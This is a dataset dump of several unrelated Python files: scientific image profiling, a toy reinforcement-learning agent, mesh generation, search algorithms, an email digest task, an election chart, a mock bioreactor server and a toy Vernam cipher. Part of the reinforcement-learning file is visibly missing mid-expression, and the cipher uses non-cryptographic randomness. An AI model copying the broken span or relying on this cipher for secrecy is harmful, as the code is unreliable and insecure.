\"iFL\").''')\nparser.add_argument('rootdir', type = str, help = '''\n\tPath to root directory with nuclear voxel content.''')\n\n# Add arguments with default value\nparser.add_argument('-n', '--nbins', type = int, help = \"\"\"\n\tNumber of bins from lamina to center. Default: 200\"\"\", default = 200)\nparser.add_argument('--selected', type = str, help = \"\"\"\n\tPath to table of selected nuclei. Mandatory columns: condition, sid, nid\"\"\")\nparser.add_argument('-S', '--suffix', type = str, help = \"\"\"\n\tSuffix for output files.\"\"\", default = \"\")\nparser.add_argument('-O', '--outdir', type = str, help = \"\"\"\n\tPath to output directory where the output should be written to.\"\"\")\nparser.add_argument('-t', '--threads', metavar = 'nthreads', type = int,\n\tdefault = 1, help = \"\"\"Number of threads to be used for parallelization.\"\"\")\n\n# Version flag\nversion = \"0.0.1\"\nparser.add_argument('--version', action = 'version',\n\tversion = '%s v%s' % (sys.argv[0], version,))\n\n# Parse arguments\nargs = parser.parse_args()\n\nassert os.path.isdir(args.rootdir)\nif type(None) == type(args.outdir):\n\targs.outdir = os.path.dirname(args.rootdir)\nelse:\n\tassert os.path.isdir(args.outdir)\n\nif 0 != len(args.suffix):\n\tif not args.suffix.startswith(\".\"):\n\t\targs.suffix = f\".{args.suffix}\"\n\nargs.threads = check_threads(args.threads)\n\nprint(f'''\n # {sys.argv[0]} v{version}\n\n Prefix : {args.prefix}\n Root : {args.rootdir}\n Selected : {args.selected}\n Suffix : \"{args.suffix}\"\n Output : {args.outdir}\n #bins : {args.nbins}\n #threads : {args.threads}\n''')\n\n# FUNCTIONS ====================================================================\n\ndef mkStatProfile(data, k):\n\td = {}\n\tif 0 != len(data):\n\t\td[k+'_mean'] = [np.nanmean(data)]\n\t\td[k+'_median'] = [np.nanmedian(data)]\n\telse:\n\t\td[k+'_mean'] = [np.nan]\n\t\td[k+'_median'] = [np.nan]\n\treturn(d)\n\ndef get_nucleus_profile(fname, args):\n\tfname = f\"{fname}.vx.tsv\"\n\n\tbins = [{\"mid\":(breaks[i]+breaks[i+1])/2,\"dna\":[],\"sig\":[],\"rat\":[]}\n\t\tfor i in range(args.nbins)]\n\n\twith open(os.path.join(args.rootdir, fname), \"r\") as IH:\n\t\tdrop = next(IH)\n\t\tfor line in IH:\n\t\t\tdata = line.strip().split(\"\\t\")\n\n\t\t\tx = float(data[5])\n\t\t\tfor bid in range(args.nbins):\n\t\t\t\tif breaks[bid] >= x:\n\t\t\t\t\tbreak\n\n\t\t\tbins[bid]['dna'].append(float(data[0]))\n\t\t\tbins[bid]['sig'].append(float(data[1]))\n\t\t\tbins[bid]['rat'].append(float(data[2]))\n\n\tfor bid in range(len(bins)):\n\t\tbinData = {\"mid\":[bins[bid]['mid']], \"eid\":eid, \"sn\":fname.split(args.prefix)[0]}\n\t\tfor k in ['dna', 'sig', 'rat']:\n\t\t\tbinData.update(mkStatProfile(bins[bid][k], k))\n\t\tbins[bid] = pd.DataFrame.from_dict(binData)\n\t\n\treturn pd.concat(bins).reset_index(drop = True)\n\n# RUN ==========================================================================\n\nflist = os.listdir(args.rootdir)\n\nmeta = {}\nfor fname in flist:\n\tif fname.endswith(\".vx.tsv\"):\n\t\teid = args.prefix + fname.split(\"_\")[0].split(args.prefix)[1]\n\t\tif eid not in meta.keys():\n\t\t\tmeta[eid] = [fname.split(\".\")[0]]\n\t\telse:\n\t\t\tmeta[eid].append(fname.split(\".\")[0])\n\nselectedNuclei = set()\nif type(None) != type(args.selected):\n\tassert os.path.isfile(args.selected)\n\tnTable = pd.read_csv(args.selected, sep = \"\\t\")\n\treqCols = (\"condition\", \"sid\", \"nid\")\n\n\tassert all([x in nTable.columns for x in reqCols])\n\tfor i in range(nTable.shape[0]):\n\t\tn = 
nTable.loc[i]\n\t\tsignature = f's{n[\"sid\"]}n{n[\"nid\"]}{n[\"condition\"]}'\n\t\tselectedNuclei.add(signature)\n\n\tassert 0 != np.sum([len(meta[x]) for x in meta.keys()])\n\tfor eid in meta.keys():\n\t\tmeta[eid] = [n for n in meta[eid] if n in selectedNuclei]\n\nassert 0 != np.sum([len(meta[x]) for x in meta.keys()])\n\nbreaks = np.linspace(0, 1, args.nbins+1)\nallData = []\neidn = 0\nfor eid in sorted(meta.keys()):\n\tprofiles = Parallel(n_jobs = args.threads, verbose = 0)(\n\t delayed(get_nucleus_profile)(fname, args)\n\t for fname in tqdm(meta[eid],\n\t \tdesc = f'{eidn+1}/{len(meta)} {eid} [n.threads={args.threads}]'))\n\tallData.extend(profiles)\n\teidn += 1\n\nprint(\"Merging and writing...\")\npd.concat(allData).reset_index(drop = True).to_csv(\n\tos.path.join(args.outdir, f'nuclear.profiles{args.suffix}.tsv'),\n\tsep = '\\t', index = False, header = True)\n\n# END ==========================================================================\n\n################################################################################\n","sub_path":"src/extract_nuclear_profiles.py","file_name":"extract_nuclear_profiles.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276801224","text":"import numpy as np\nfrom time import sleep\nfrom ttkthemes import ThemedTk as tk\nfrom tkinter import ttk\n\nclass Window:\n def __init__(self):\n self.root = tk(theme='radiance')\n #self.root.get_themes()\n #self.root.set_theme('radiance')\n self.b = ttk.Button(self.root,text='hola')\n self.b.pack()\n self.root.mainloop()\n#w = Window()\n\nY_REGION = 16\nX_REGION = 20\nINITIAL_STATE = (0.5,0.5)\nGOAL = ((4.3,5.3),(8.9,9.9))\nOBSTACLES = []\nNUM_MAGNITUDES_OF_EACH_BEHAVIOR = 5\nNUM_BEHAVIORS = 4\nTOTAL_OUTPUTS = NUM_MAGNITUDES_OF_EACH_BEHAVIOR*NUM_BEHAVIORS\ndef ReLU(z):\n z[z<0] = 0\n return z\ndef ReLU_prime(z):\n z[z>0] = 1\n z[z<=0] = 0\n return z\ndef get_center(ranges):\n center =(ranges[0][0] + ranges[0][1])/2,(ranges[1][0] + ranges[1][1])/2\n return center\ndef get_euclidean_distance_to_goal(state,goal):\n s = state\n g = goal\n x_dist = np.abs(s[1]-g[1])\n y_dist = np.abs(s[0]-g[0])\n euc_dis = np.sqrt(np.power(x_dist,2)+np.power(y_dist,2))\n return euc_dis\nclass Environment:\n def __init__(self,y_region,x_region,initial_state,goal):\n self.y_region = y_region\n self.x_region = x_region\n self.initial_state = initial_state\n self.state = initial_state\n self.goal = goal\n self.goal_center = get_center(self.goal)\n self.terminal = False\n self.last_state = None\n self.last_distance_to_goal = get_euclidean_distance_to_goal(self.state,self.goal_center)\n self.behavior_step = 1\n self.jump_distance = 2\n #self.magnitud_of_movement =\n def next_state(self,behavior,value):\n self.last_state = self.state\n y = 0\n x = 0\n #print('v',value)\n #print('b',behavior)\n nmoeb = NUM_MAGNITUDES_OF_EACH_BEHAVIOR\n if 0<=behavior<=nmoeb-1:\n # print('0-2')\n y = -0.5 - behavior*self.jump_distance\n elif nmoeb<=behavior<=2*nmoeb-1:\n # print('3-5')\n x = -0.5 - (behavior-nmoeb)*self.jump_distance\n elif 2*nmoeb<=behavior<=3*nmoeb-1:\n # print('6-8')\n y = 0.5 + (behavior-2*nmoeb)*self.jump_distance\n elif 3*nmoeb<=behavior<=4*nmoeb-1:\n # print('9-11')\n x = 0.5 + (behavior-3*nmoeb)*self.jump_distance\n# if behavior == 0:\n# y =-self.behavior_step\n# elif behavior == 1:\n# x =-self.behavior_step\n# elif behavior == 2:\n# y = self.behavior_step\n# elif behavior == 3:\n# x = self.behavior_step\n if 0 <= self.state[1] + x 
<= X_REGION and 0 <= self.state[0] + y <= Y_REGION:\r\n #section for code that checks whether the agent is inside\r\n #the region of a block\r\n self.state = (self.state[0]+y ,self.state[1]+x)\r\n return self.state\r\n\r\n def get_reward(self):\r\n new_dist = get_euclidean_distance_to_goal(self.state,self.goal_center)\r\n if self.goal[0][0]<=self.state[0]<=self.goal[0][1] and \\\r\n self.goal[1][0]<=self.state[1]<=self.goal[1][1]:\r\n self.terminal = True\r\n return 1\r\n\r\n# elif new_distmin_eps:\r\n agent.eps *=eps_decaying_factor\r\n agent.lr *=lr_decaying_factor\r\n\r\n print('GOAL',env.goal_center,episodes[-1])\r\n","sub_path":"shallow_nn_rl_distance.py","file_name":"shallow_nn_rl_distance.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"432537910","text":"import os, math\n\nfrom opendm import log\nfrom opendm import io\nfrom opendm import system\nfrom opendm import context\nfrom opendm import mesh\nfrom opendm import gsd\nfrom opendm import types\n\n\ndef mesh_3d(odm_mesh_folder,odm_mesh_ply, filter_point_cloud_path, max_concurrency):\n if not io.file_exists(odm_mesh_ply):\n log.ODM_INFO('Writing ODM Mesh file in: %s' % odm_mesh_ply)\n oct_tree = 10\n samples = 1.0\n max_vertex = 200000\n point_weight = 4\n verbose = False\n mesh.screened_poisson_reconstruction(filter_point_cloud_path,\n odm_mesh_ply,\n depth=oct_tree,\n samples=samples,\n maxVertexCount=max_vertex,\n pointWeight=point_weight,\n threads=max(1, max_concurrency - 1), # poissonrecon can get stuck on some machines if --threads == all cores\n verbose=verbose)\n\n else:\n log.ODM_WARNING('Found a valid ODM Mesh file in: %s' %\n odm_mesh_ply)\n","sub_path":"mesh_interface.py","file_name":"mesh_interface.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"237956553","text":"def linearSearch(arr, x): \r\n for i in range(len(arr)): \r\n if arr[i] == x: \r\n return i \r\n\r\ndef binary_search(arr, x): \r\n low = 0\r\n high = len(arr) - 1\r\n mid = 0\r\n \r\n while low <= high: \r\n mid = (high + low) // 2\r\n if arr[mid] < x: \r\n low = mid + 1\r\n\r\n elif arr[mid] > x: \r\n high = mid - 1\r\n \r\n else: \r\n return mid \r\n \r\n \r\narr = [ 2, 3, 4, 10, 40 ] \r\nx = 10\r\n \r\n\r\nopt = input(\"enter l or b for searching\")\r\nif opt == \"b\":\r\n result= binary_search(arr,x)\r\n print(\"binary search\")\r\n print(result)\r\n \r\nelif opt == \"l\":\r\n result= linearSearch(arr,x)\r\n print(\"linear search\")\r\n print(result)\r\n","sub_path":"prac5.py","file_name":"prac5.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"440529098","text":"from celery import shared_task\nfrom .models import Post, Category\nfrom datetime import datetime\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMultiAlternatives\nimport time\n\n@shared_task\ndef my_job():\n tags_post_dict = {}\n tags_users_dict = {}\n list_of_posts = []\n list_of_users = []\n tags_subs = {}\n for tag in Category.objects.all():\n tags_post_dict[tag.tag] = Post.objects.filter(create_time__gt= datetime.fromtimestamp(datetime.timestamp(datetime.now()) - 604800), categories=tag)\n tags_users_dict[tag.tag] = Category.objects.get(tag=tag).subscribers.all()\n list_of_posts.append(Post.objects.filter(create_time__gt= 
datetime.fromtimestamp(datetime.timestamp(datetime.now()) - 604800), categories=tag))\n\n\n for tag in Category.objects.all():\n posts = tags_post_dict[tag.tag]\n users = tags_users_dict[tag.tag]\n emails = []\n for user in users:\n emails.append(user.email)\n html_content = render_to_string(\n '../templates/weekly_subscription.html',\n {\n 'posts': posts, 'tag': tag.tag,\n }\n )\n msg = EmailMultiAlternatives(\n subject='Weekly news digest',\n body='',\n from_email='zagaalexey@yandex.ru',\n to= emails\n )\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()","sub_path":"news/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"576731088","text":"'''\nThis script produces a bar graph of candidate votes for the original election. Only the original election dataset\nis required. \nEthan Eason, August 2019\n'''\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\n\n# reads in data for the original election\ndf_path = os.path.join('D:/Honduras Project Data', 'Honduras_Election_Data.csv')\ndf = pd.read_csv(df_path)\n\n# arrays to store all candidates' respective vote shares in the original election\nJADN = np.sum(df['JADN']) # JOSE ALFONSO DIAZ NARVAEZ\nSACNS = np.sum(df['SACNS']) # SALVADOR ALEJANDRO CESAR NASRALLA SALUM\nEVR = np.sum(df['EVR']) # ELISEO VALLECILLO REYES\nLEAP = np.sum(df['LEAP']) # LUCAS EVANGELISTO AGUILERA PINEDA\nLOZM = np.sum(df['LOZM']) # LUIS ORLANDO ZELAYA MEDRANO\nROVV = np.sum(df['ROVV']) # ROMEO ORLANDO VASQUEZ VELASQUEZ\nIFA = np.sum(df['IFA']) # ISAIAS FONSECA AGUILAR\nMEAC = np.sum(df['MEAC']) # MARLENE ELIZABETH ALVARENGA CASTELLANOS\nJOHA = np.sum(df['JOHA']) # JUAN ORLANDO HERNANDEZ ALVARADO\n\n# produces bar graph of candidate votes in the original election\nN = 9\nvotes = (JADN, SACNS, EVR, LEAP, LOZM, ROVV, IFA, MEAC, JOHA)\nspc = np.arange(N)\nplt.bar(spc, votes)\nplt.ylabel('Valid Votes')\nplt.xlabel('Candidate')\nplt.xticks(spc, ('JADN', 'SACNS', 'EVR', 'LEAP', 'LOZM', 'ROVV', 'IFA', 'MEAC', 'JOHA'))\nplt.title('Candidate Vote Totals')\nplt.show()\n","sub_path":"analytics/candidate_votes_bar.py","file_name":"candidate_votes_bar.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"81750696","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 11/04/2014\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\nfrom collections import OrderedDict\nfrom hello.mock.util import nextroutine, HelloXMLGenerator, simple_xml_dump, json_dumps\n\n__author__ = 'Nathan Starkweather'\n\nfrom math import sin as _sin, pi as _pi\nfrom time import time as _time\nfrom xml.etree.ElementTree import Element, SubElement\n\n\n@nextroutine\ndef sin_wave(amplitude, period, middle=0, offset=0, gen=None, trigfunc=None):\n \"\"\"\n @param amplitude: Size of wave (int)\n @param period: period of wave (in units returned from gen)\n @param middle: vertical offset of wave\n @param offset: horizontal offset of wave\n @param gen: infinite iterator. each new value is used to step the output. default to time().\n @param trigfunc: trig function to use in mainloop. 
default to math.sin().\n \"\"\"\n if gen is None:\n gen = _time\n pi = _pi\n if trigfunc is None:\n trigfunc = _sin\n\n pi_over_180 = pi / 180\n start = gen()\n while True:\n t = gen() - start\n result = amplitude * trigfunc((t / period) * pi_over_180 + offset) + middle\n yield t, result\n\n\n@nextroutine\ndef simple_wave(xfunc, yfunc):\n \"\"\"\n @param xfunc: infinite generator accepting no arguments, yielding x values\n @param yfunc: infinite generator accepting a single argument from xfunc, yielding f(x) values\n \"\"\"\n start = xfunc()\n yield start, yfunc(start)\n while True:\n x = xfunc() - start\n yield x, yfunc(x)\n\n\n@nextroutine\ndef multiwave(waves, middle=0):\n \"\"\"\n @param waves: a list or tuple of wave funcs. waves 'middle' argument\n must all be 0 to work properly.\n @param middle: the middle of the waves\n \"\"\"\n\n if not waves:\n raise ValueError(\"Waves is empty\")\n\n # ensure that the waves iterable is a) a container and not an iterator,\n # and b) can't be weirdly modified by passing in a mutable list\n waves = tuple(waves)\n\n # why did I bother unrolling these loops???\n if len(waves) == 1:\n w = waves[0]\n startx, y = w()\n yield startx, y + middle\n while True:\n x, y = w()\n yield x - startx, y + middle\n\n # for the loops with multiple waves, only the x value\n # for the *first* function is taken into effect\n # don't abuse this!\n elif len(waves) == 2:\n w1, w2 = waves\n startx, y1 = w1()\n _, y2 = w2()\n yield startx, y1 + y2 + middle\n while True:\n x1, y1 = w1()\n _, y2 = w2()\n yield x1 - startx, y1 + y2 + middle\n\n elif len(waves) == 3:\n w1, w2, w3 = waves\n startx, y1 = w1()\n _, y2 = w2()\n _, y3 = w3()\n yield startx, middle + y1 + y2 + y3\n while True:\n x, y1 = w1()\n _, y2 = w2()\n _, y3 = w3()\n yield x - startx, middle + y1 + y2 + y3\n\n # general case.\n # reverse the order of waves so that \"startx\" and \"x\" can be\n # reused within the loop body and end up containing the proper\n # values at the end\n rv = middle\n waves = waves[::-1]\n startx = x = 0\n for w in waves:\n startx, y = w()\n rv += y\n yield startx, rv\n\n while True:\n rv = middle\n waves = waves[::-1]\n for w in waves:\n x, y = w()\n rv += y\n yield x, rv\n\n\nclass BaseController():\n\n \"\"\" Base controller for Backend controllers.\n Controllers know:\n - Their current values\n - The appropriate units for each value (for getMainInfo)\n - How to turn the above into dict objects or Element trees.\n \"\"\"\n\n name_to_lv_type = {\n 'pv': 'SGL',\n 'sp': 'SGL',\n 'man': 'SGL',\n 'manUp': 'SGL',\n 'manDown': 'SGL',\n 'mode': 'U16',\n 'error': 'U16',\n 'interlocked': 'U32'\n }\n\n def __init__(self, name):\n \"\"\"\n @param name: Name of controller\n @type name: str\n @return:\n \"\"\"\n self.name = name\n self._history = []\n\n # these are just placeholders, and will be overridden\n # by subclasses.\n self.pv = 0\n self._pvgenerator = lambda: (0, 0)\n self.mv_attrs = (\"pv\",)\n self.mi_attrs = (\"pvUnit\",)\n\n def set_pvgen(self, gen):\n self._pvgenerator = gen\n\n def step(self):\n rv = self._pvgenerator()\n pv = rv[1]\n self.pv = pv\n self._history.append(rv)\n return pv\n\n def step2(self):\n rv = self._pvgenerator()\n self.pv = rv[1]\n self._history.append(rv)\n return rv # t, pv\n\n def mv_todict(self):\n return {'pv': self.pv}\n\n def mv_todict2(self):\n return OrderedDict((attr, getattr(self, attr)) for attr in self.mv_attrs)\n\n def mv_toxml(self, root=None):\n if root is None:\n cluster = Element('Cluster')\n else:\n cluster = SubElement(root, 'Cluster')\n 
cluster.text = '\\n'\n cluster.tail = \"\\n\"\n\n name = SubElement(cluster, \"Name\")\n name.text = self.name\n name.tail = \"\\n\"\n vals = SubElement(cluster, 'NumElts')\n vals.text = str(len(self.mv_attrs))\n vals.tail = \"\\n\"\n\n # python unifies number types into a single\n # type, so we have to use a separate mapping\n # to find the proper \"type\" label to wrap\n # the element in.\n for attr in self.mv_attrs:\n lv_type = self.name_to_lv_type[attr]\n typ = SubElement(cluster, lv_type)\n typ.text = \"\\n\"\n typ.tail = \"\\n\"\n\n name = SubElement(typ, \"Name\")\n name.text = attr\n name.tail = \"\\n\"\n val = SubElement(typ, \"Val\")\n\n if lv_type == 'SGL':\n val.text = \"%.5f\" % getattr(self, attr)\n else:\n val.text = \"%s\" % getattr(self, attr)\n val.tail = \"\\n\"\n\n return cluster\n\n def mv_toxml2(self):\n return [(attr, getattr(self, attr)) for attr in self.mv_attrs]\n\n def mi_toxml(self, root=None):\n if root is None:\n cluster = root = Element('Cluster')\n else:\n cluster = SubElement(root, 'Cluster')\n cluster.text = '\\n'\n name = SubElement(cluster, \"Name\")\n name.text = self.name\n NumElts = SubElement(cluster, \"NumElts\")\n NumElts.text = str(len(self.mi_attrs))\n for attr in self.mi_attrs:\n val = getattr(self, attr)\n string_ele = SubElement(cluster, \"String\")\n string_ele.text = '\\n'\n name_ele = SubElement(string_ele, \"Name\")\n name_ele.text = attr\n val_ele = SubElement(string_ele, \"Val\")\n val_ele.text = val\n\n return root\n\n def mi_todict(self):\n return OrderedDict((attr, getattr(self, attr)) for attr in self.mi_attrs)\n\n\nclass StandardController(BaseController):\n def __init__(self, name, pv=0, sp=20, man=5, mode=2, error=0, interlocked=0,\n pvUnit='', manUnit='', manName=''):\n\n super().__init__(name)\n self.pv = pv\n self.sp = sp\n self.man = man\n self.mode = mode\n self.error = error\n self.interlocked = interlocked\n self.pvUnit = pvUnit\n self.manUnit = manUnit\n self.manName = manName\n\n self.mv_attrs = 'pv', 'sp', 'man', 'mode', 'error', 'interlocked'\n self.mi_attrs = 'pvUnit', 'manUnit', 'manName'\n\n self.set_pvgen(sin_wave(5, 30, 15))\n\n def mv_todict(self):\n return {\n 'pv': self.pv,\n 'sp': self.sp,\n 'man': self.man,\n 'mode': self.mode,\n 'error': self.error,\n 'interlocked': self.interlocked\n }\n\n\nclass TwoWayController(BaseController):\n def __init__(self, name, pv=0, sp=20, manup=5, mandown=0, mode=2, error=0, \n interlocked=0, pvUnit='', manUpUnit='', manDownUnit='', manUpName='',\n manDownName=''):\n BaseController.__init__(self, name)\n self.pv = pv\n self.sp = sp\n self.manUp = manup\n self.manDown = mandown\n self.mode = mode\n self.error = error\n self.interlocked = interlocked\n self.pvUnit = pvUnit\n self.manUpUnit = manUpUnit\n self.manDownUnit = manDownUnit\n self.manUpName = manUpName\n self.manDownName = manDownName\n\n self.mv_attrs = 'pv', 'sp', 'manUp', 'manDown', 'mode', 'error', 'interlocked'\n self.mi_attrs = 'pvUnit', 'manUpUnit', 'manDownUnit', 'manUpName', 'manDownName'\n\n self.set_pvgen(sin_wave(3, 60, 50))\n\n def mv_todict(self):\n return {\n 'pv': self.pv,\n 'sp': self.sp,\n 'manUp': self.manUp,\n 'manDown': self.manDown,\n 'mode': self.mode,\n 'error': self.error,\n 'interlocked': self.interlocked\n }\n\n\nclass SmallController(BaseController):\n def __init__(self, name, pv=0, sp=0, mode=0, error=0, pvUnit=\"\"):\n BaseController.__init__(self, name)\n self.pv = pv\n self.sp = sp\n self.mode = mode\n self.error = error\n self.pvUnit = pvUnit\n\n self.mv_attrs = 'pv', 'mode', 'error'\n 
self.mi_attrs = 'pvUnit',\n\n self.set_pvgen(sin_wave(1, 10, 5))\n\n def mv_todict(self):\n return {\n 'pv': self.pv,\n 'mode': self.mode,\n 'error': self.error\n }\n\n\nclass AgitationController(StandardController):\n def __init__(self, pv=0, sp=20, man=5, mode=2, error=0, interlocked=0):\n StandardController.__init__(self, \"Agitation\", pv, sp, man, mode, error, interlocked)\n self.pvUnit = \"RPM\"\n self.manUnit = \"%\"\n self.manName = \"Percent Power\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'interlocked')\n\n\nclass TemperatureController(StandardController):\n def __init__(self, pv=0, sp=20, man=5, mode=2, error=0, interlocked=0):\n StandardController.__init__(self, \"Temperature\", pv, sp, man, mode, error, interlocked)\n self.pvUnit = \"\\xb0C\"\n self.manUnit = \"%\"\n self.manName = \"Heater Duty\"\n\n\nclass pHController(TwoWayController):\n def __init__(self, pv=0, sp=20, manup=5, mandown=0, mode=2, error=0, interlocked=0):\n TwoWayController.__init__(self, \"pH\", pv, sp, manup, mandown, mode, error, interlocked)\n self.pvUnit = \"\"\n self.manUpUnit = \"%\"\n self.manDownUnit = \"%\"\n self.manUpName = \"Base\"\n self.manDownName = \"CO_2\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'interlocked')\n\n\nclass DOController(TwoWayController):\n def __init__(self, pv=0, sp=20, manup=5, mandown=0, mode=2, error=0, interlocked=0):\n TwoWayController.__init__(self, \"DO\", pv, sp, manup, mandown, mode, error, interlocked)\n self.pvUnit = \"%\"\n self.manUpUnit = \"mL/min\"\n self.manDownUnit = \"%\"\n self.manUpName = \"O_2\"\n self.manDownName = \"N_2\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'interlocked')\n\n\nclass MainGasController(StandardController):\n def __init__(self, pv=0, sp=0, mode=0, error=0, interlocked=0):\n # pass by keyword: the parent also takes 'man' between sp and mode\n StandardController.__init__(self, \"MainGas\", pv=pv, sp=sp, mode=mode, error=error, interlocked=interlocked)\n self.pvUnit = \"L/min\"\n self.manUnit = \"L/min\"\n self.manName = \"Total Flow\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'sp')\n\n\nclass LevelController(SmallController):\n def __init__(self, pv=0, sp=0, mode=0, error=0):\n SmallController.__init__(self, \"Level\", pv, sp, mode, error)\n self.pvUnit = \"L\"\n\n\nclass FilterOvenController(SmallController):\n def __init__(self, pv=0, sp=0, mode=0, error=0):\n SmallController.__init__(self, \"Condenser\", pv, sp, mode, error)\n self.pvUnit = \"\\xb0C\"\n\n\nclass PressureController(SmallController):\n def __init__(self, pv=0, sp=0, mode=0, error=0):\n SmallController.__init__(self, \"Pressure\", pv, sp, mode, error)\n self.pvUnit = \"psi\"\n\n\nclass SecondaryHeatController(StandardController):\n def __init__(self, pv=0, sp=0, mode=0, error=0, interlocked=0):\n # pass by keyword: the parent also takes 'man' between sp and mode\n StandardController.__init__(self, \"SecondaryHeat\", pv=pv, sp=sp, mode=mode, error=error, interlocked=interlocked)\n self.pvUnit = \"\\xb0C\"\n self.manUnit = \"%\"\n self.manName = \"Heater Duty\"\n\n\nclass HelloStateError(Exception):\n pass\n\n\nclass AuthError(HelloStateError):\n \"\"\" generic permissions error \"\"\"\n pass\n\n\nclass LoginError(AuthError):\n \"\"\" specifically, bad username/password\n \"\"\"\n\n\nfrom time import time\n\n\nversion_info = OrderedDict((\n (\"RIO\", \"V12.1\"),\n (\"Server\", \"V3.1\"),\n (\"Model\", \"PBS 3\"),\n (\"Database\", \"V2.2\"),\n (\"Serial Number\", \"01459C77\"),\n (\"Magnetic Wheel\", True)\n))\n\n\nclass HelloState():\n\n def __init__(self):\n self.agitation = a = AgitationController(0, 20, 1, 0, 0, 0)\n self.temperature = t = TemperatureController(30, 37, 0, 0, 0, 0)\n self.ph = ph 
= pHController(7, 7.1, 5, 5, 0)\n self.do = d = DOController(50, 70, 15, 150, 0)\n self.maingas = m = MainGasController(0, 0, 0.5, 1)\n self.secondaryheat = sh = SecondaryHeatController(30, 37, 0, 0)\n self.level = l = LevelController(3)\n self.filteroven = f = FilterOvenController(40, 50)\n self.pressure = p = PressureController(0, 0, 0)\n\n self._mv_controller_array = a, t, sh, d, ph, p, l, f, m\n self._mi_controller_array = a, t, d, ph, p, l, f, sh, m\n\n self._login_info = {\n 'user1': '12345',\n 'pbstech': '727246',\n 'webuser1': '1'\n }\n self._logged_in = False\n self._last_login = 0\n\n self._version_info = version_info.copy()\n self.true_reply_xml_encoding = \"windows-1252\"\n\n self.xml_gen = HelloXMLGenerator()\n\n def step_main_values(self):\n for c in self._mv_controller_array:\n c.step()\n\n def get_dict_main_values(self):\n return OrderedDict((\n (\"result\", \"True\"),\n (\"message\", OrderedDict((c.name.lower(), c.mv_todict2()) for c in self._mv_controller_array))\n ))\n\n def get_update(self, json=True):\n self.step_main_values()\n return self.getMainValues(json)\n\n def get_xml_main_values(self):\n\n # I don't know why, but the server reply for the\n # real hello webserver returns main value controllers\n # in a different order if xml vs json is requested.\n # 4-15-15: XML is created via dump to string, JSON by format\n # existing string template.\n\n message = [(c.name, c.mv_toxml()) for c in self._mv_controller_array if c.name != 'SecondaryHeat']\n message.append((self.secondaryheat.name, self.secondaryheat.mv_toxml()))\n return self.xml_gen.hello_tree_from_msg(message, \"Message\")\n\n def getMainValues(self, json=True):\n if json:\n return json_dumps(self.get_dict_main_values())\n else:\n return self.xml_gen.tree_to_xml(self.get_xml_main_values(), 'windows-1252')\n\n def login(self, val1, val2, loader, skipvalidate):\n user = val1 # clarity\n pwd = val2 # clarity\n missing = object()\n if self._login_info.get(user.lower(), missing) == pwd:\n self._logged_in = True\n self._last_login = time()\n return True\n return False\n\n def logout(self):\n self._logged_in = False\n return True\n\n def getversion(self, json=False):\n\n message = self._version_info\n if json:\n reply = OrderedDict((\n (\"result\", \"True\"),\n (\"message\", message)\n ))\n rv = json_dumps(reply)\n else:\n rv = self.xml_gen.create_hello_xml(message, \"Versions\",\n \"True\", self.true_reply_xml_encoding)\n\n return rv\n\n def getmaininfo(self, json=False):\n message = OrderedDict((c.name, c.mi_todict()) for c in self._mi_controller_array)\n message['BioReactorModel'] = self._version_info['Model']\n message.move_to_end('SecondaryHeat')\n message.move_to_end('MainGas')\n if json:\n msg = json_dumps(OrderedDict((\n (\"result\", \"True\"),\n (\"message\", message)\n )))\n\n return msg.encode('utf-8')\n else:\n return self.xml_gen.create_hello_xml(message, \"Message\", \"True\", self.true_reply_xml_encoding)\n\n\ndef test1():\n from xml.etree.ElementTree import XML\n xml = HelloState().getMainValues(False)\n xml = XML(xml)\n for line in simple_xml_dump(xml).split():\n print(line)\n # dump(xml)\n\nif __name__ == '__main__':\n test1()\n","sub_path":"archive/mock/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":16740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"9964499","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport random\nimport string\n\n\nclass ChiffreVernam:\n\n \"\"\"\n Constructor: here we initialize the text to 
encrypt or decrypt,\n the list of characters to use, and the key that will be used for encryption\n \"\"\"\n def __init__(self, sText, aChars=list(\" ?!,.'\\\"\"+string.ascii_letters+string.digits)):\n if isinstance(sText, str) and len(sText) > 0:\n self.sText = sText\n else:\n raise Exception(\"The variable \\\"sText\\\" must be a string with a length greater than 0!\")\n if isinstance(aChars, list) and len(aChars) > 10:\n self.aChars = aChars\n self.sMask = ''.join(random.choice(aChars) for x in range(len(self.sText)))\n else:\n raise Exception(\"The variable \\\"aChars\\\" must be a list with more than 10 characters!\")\n\n \"\"\"\n This function encrypts a single character using a mask character\n \"\"\"\n def __cryptChar(self, actChar, maskChar):\n iActChar = self.aChars.index(actChar)\n iMaskChar = self.aChars.index(maskChar)\n # wrap around with a modulo so encryption and decryption are exact inverses\n iCryptedChar = (iActChar + iMaskChar) % len(self.aChars)\n return self.aChars[iCryptedChar]\n\n \"\"\"\n This function decrypts a single character using\n the mask character with which it was encrypted\n \"\"\"\n def __decryptChar(self, cryptedChar, maskChar):\n iCryptedChar = self.aChars.index(cryptedChar)\n iMaskChar = self.aChars.index(maskChar)\n iActChar = (iCryptedChar - iMaskChar) % len(self.aChars)\n return self.aChars[iActChar]\n\n \"\"\"\n This function calls __cryptChar to\n encrypt the text using the key generated in the 